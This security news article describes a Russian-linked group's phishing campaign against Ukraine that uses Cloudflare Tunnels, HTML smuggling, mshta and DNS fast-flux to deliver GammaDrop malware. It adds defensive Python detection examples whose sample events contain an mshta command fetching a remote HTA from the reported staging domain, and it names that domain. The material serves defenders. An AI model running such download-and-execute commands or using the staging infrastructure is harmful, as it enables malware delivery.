
Hackers Exploit Cloudflare Tunnels and DNS Fast-Flux to Conceal GammaDrop Malware

 A notorious threat actor known as Gamaredon has been observed employing Cloudflare Tunnels to hide its malware staging infrastructure, facilitating the deployment of GammaDrop malware. This technique is part of a spear-phishing campaign actively targeting Ukrainian organizations since early 2024. 

Campaign Details and Tactics 

According to Recorded Future's Insikt Group, the primary goal of this campaign is to deliver Visual Basic Script malware. Recorded Future tracks the group as BlueAlpha; other vendors have identified the same actor under several other names, including:

  • Aqua Blizzard
  • Armageddon
  • Hive0051
  • Iron Tilden
  • Primitive Bear
  • Shuckworm
  • Trident Ursa
  • UAC-0010
  • UNC530
  • Winterflounder
Active since 2014, BlueAlpha is linked to Russia's Federal Security Service (FSB). "BlueAlpha has recently started using Cloudflare Tunnels to obscure staging infrastructure for GammaDrop, a tactic gaining traction among cybercriminal groups," noted Insikt Group. Additionally, the group continues to use DNS fast-fluxing to complicate the tracking and disruption of command-and-control (C2) communications. 
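Fast-flux makes a single hostname resolve to a rotating set of addresses with short TTLs, so blocking any one IP is useless. The following detector is an added example, not tooling from Recorded Future or ESET: it scores hostnames from passive-DNS style records by counting distinct answer addresses, distinct /24 networks and average TTL. The records are constructed to show the pattern and are not observed BlueAlpha infrastructure; the thresholds are assumptions to tune against your own resolver data.

```python
"""Heuristic fast-flux scoring over passive-DNS style records (added example)."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample records: (unix_ts, qname, answer_ip, ttl_seconds).
# "flux.example" rotates across unrelated documentation networks with short TTLs;
# "static.example" is a normal host with one stable address and a long TTL.
SAMPLE_RECORDS = [
    (1700000000, "flux.example", "198.51.100.10", 120),
    (1700000120, "flux.example", "203.0.113.45", 120),
    (1700000240, "flux.example", "192.0.2.77", 90),
    (1700000360, "flux.example", "198.51.100.200", 120),
    (1700000480, "flux.example", "203.0.113.9", 60),
    (1700000600, "flux.example", "192.0.2.130", 120),
    (1700000000, "static.example", "198.51.100.5", 86400),
    (1700003600, "static.example", "198.51.100.5", 86400),
]


def _network_of(ip):
    """Bucket an address by /24 (IPv4) or /64 (IPv6) to measure hosting diversity."""
    prefix = 24 if ip.version == 4 else 64
    return ip_network(f"{ip}/{prefix}", strict=False)


def fast_flux_score(records, max_ttl=300, min_ips=4, min_nets=3):
    """Return {qname: metrics} where metrics['flux'] is True when the name
    answers with at least `min_ips` distinct addresses spread over at least
    `min_nets` distinct networks and the average TTL is at most `max_ttl`.
    Thresholds are assumed defaults, not values from the report."""
    by_name = defaultdict(list)
    for _ts, name, ip, ttl in records:
        by_name[name.lower()].append((ip_address(ip), ttl))

    result = {}
    for name, answers in by_name.items():
        ips = {ip for ip, _ in answers}
        nets = {_network_of(ip) for ip in ips}
        avg_ttl = sum(ttl for _, ttl in answers) / len(answers)
        result[name] = {
            "distinct_ips": len(ips),
            "distinct_nets": len(nets),
            "avg_ttl": avg_ttl,
            "flux": len(ips) >= min_ips and len(nets) >= min_nets and avg_ttl <= max_ttl,
        }
    return result


if __name__ == "__main__":
    for name, m in fast_flux_score(SAMPLE_RECORDS).items():
        print(name, m)
```

Because GammaLoad resolves its C2 through DoH (Google and Cloudflare), the enterprise resolver never sees these queries; records like the above would have to come from a DoH-inspecting proxy, a sandbox detonation or a passive-DNS feed rather than from internal resolver logs.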
 
Recent Observations 

The use of Cloudflare Tunnels by Gamaredon was first reported in September 2024 by ESET, a Slovak cybersecurity firm, during attacks targeting Ukraine and NATO countries, including Bulgaria, Latvia, Lithuania, and Poland. ESET described BlueAlpha's methods as "reckless and not particularly stealth-focused," although the group employs measures to evade detection and maintain access to compromised systems. These include deploying multiple simple downloaders or backdoors and frequently updating their malware tools with regularly changing obfuscation techniques. 
 
Malware Deployment Process 

The phishing campaign uses HTML attachments to initiate infections via HTML smuggling: JavaScript inside the attachment reconstructs the payload on the victim's machine and triggers a download, so the archive never crosses the mail gateway as a separate file. Key steps include:
  • Phishing emails with HTML attachments drop a 7-Zip archive ("56-27-11875.rar") containing a malicious LNK file.
  • The LNK file abuses the Windows-native mshta.exe (a living-off-the-land binary, not a vulnerability) to execute the next stage and deliver GammaDrop malware.
  • GammaDrop deploys a custom loader, GammaLoad, which connects to a C2 server to retrieve additional malware.
The GammaDrop malware is staged on a server behind a Cloudflare Tunnel, with the domain amsterdam-sheet-veteran-aka.trycloudflare[.]com serving as a staging point. GammaLoad uses DNS-over-HTTPS (DoH) services from Google and Cloudflare to resolve C2 infrastructure, falling back to fast-flux DNS when DoH is unavailable. Resolving over DoH bypasses the organization's own resolver, so DNS-based blocklists and resolver logs see nothing unless DoH traffic is itself inspected or blocked.
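Each step of the chain above leaves endpoint telemetry a detection engineer can key on: a shortcut launched from the shell spawns mshta.exe with a URL on its command line, a script host queries a trycloudflare.com quick-tunnel name, and a script host rather than a browser opens TLS to a public DoH resolver. The rules below are an added example run over constructed events shaped like Sysmon process-create (ID 1), DNS-query (ID 22) and network-connect (ID 3) records; the HTA path, the loader file name and the resolver addresses are assumptions, and the staging domain is the one named in the report.

```python
"""Endpoint detection rules for the GammaDrop delivery chain (added example)."""
import re

# Public resolver addresses that also serve DNS-over-HTTPS; GammaLoad is reported
# to use Google and Cloudflare DoH. Addresses are assumed from public resolver docs.
DOH_RESOLVER_IPS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "1.0.0.1"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[\w.-]+", re.IGNORECASE)

# Constructed sample events. Paths and file names are hypothetical; the
# trycloudflare host is the staging domain from the report.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'"C:\Windows\System32\mshta.exe" https://amsterdam-sheet-veteran-aka.trycloudflare.com/stage.hta'},
    {"id": 22, "image": r"C:\Windows\System32\mshta.exe",
     "query": "amsterdam-sheet-veteran-aka.trycloudflare.com"},
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmd": r"wscript.exe //e:vbscript C:\Users\u\AppData\Local\Temp\loader.vbs"},
    {"id": 3, "image": r"C:\Windows\System32\wscript.exe", "dst_ip": "8.8.8.8", "dst_port": 443},
    # benign noise: a normal process launch and a browser using DoH
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "notepad.exe"},
    {"id": 3, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_ip": "8.8.8.8", "dst_port": 443},
]


def basename(path):
    """Lower-cased file name of a Windows path ('' if missing)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, image_basename) for every event matching a rule."""
    hits = []
    for e in events:
        img = basename(e.get("image", ""))
        parent = basename(e.get("parent", ""))
        if e["id"] == 1 and img == "mshta.exe" and parent == "explorer.exe" \
                and URL_RE.search(e.get("cmd", "")):
            # user double-clicked a shortcut whose target is mshta + remote URL
            hits.append(("mshta_remote_hta_from_shell", img))
        elif e["id"] == 22 and e.get("query", "").lower().endswith(".trycloudflare.com"):
            # quick-tunnel hostnames are rare in enterprise traffic; allowlist dev use
            hits.append(("trycloudflare_staging_lookup", img))
        elif e["id"] == 1 and parent == "mshta.exe" and img in SCRIPT_HOSTS:
            # HTA stage handing off to a VBScript/PowerShell loader
            hits.append(("script_host_spawned_by_mshta", img))
        elif e["id"] == 3 and e.get("dst_ip") in DOH_RESOLVER_IPS \
                and e.get("dst_port") == 443 and img in SCRIPT_HOSTS:
            # browsers legitimately speak DoH; script hosts doing so is suspicious
            hits.append(("doh_from_script_host", img))
    return hits


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {image}")
```

The DoH rule is deliberately scoped to script hosts: flagging every connection to 8.8.8.8:443 would drown in browser noise, while blocking DoH egress at the firewall for everything except approved browsers forces a GammaLoad-style implant onto its fast-flux fallback, where ordinary resolver logging applies.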
 
Implications and Future Threats 

Recorded Future warns that BlueAlpha is likely to continue refining its evasion techniques by exploiting legitimate services like Cloudflare. This approach complicates detection for traditional security systems. The group's enhancements to HTML smuggling and DNS-based persistence highlight evolving challenges for organizations with limited threat detection capabilities. "Organizations must strengthen their defenses against phishing campaigns and adopt advanced threat detection strategies to mitigate risks posed by actors like BlueAlpha," the report concluded.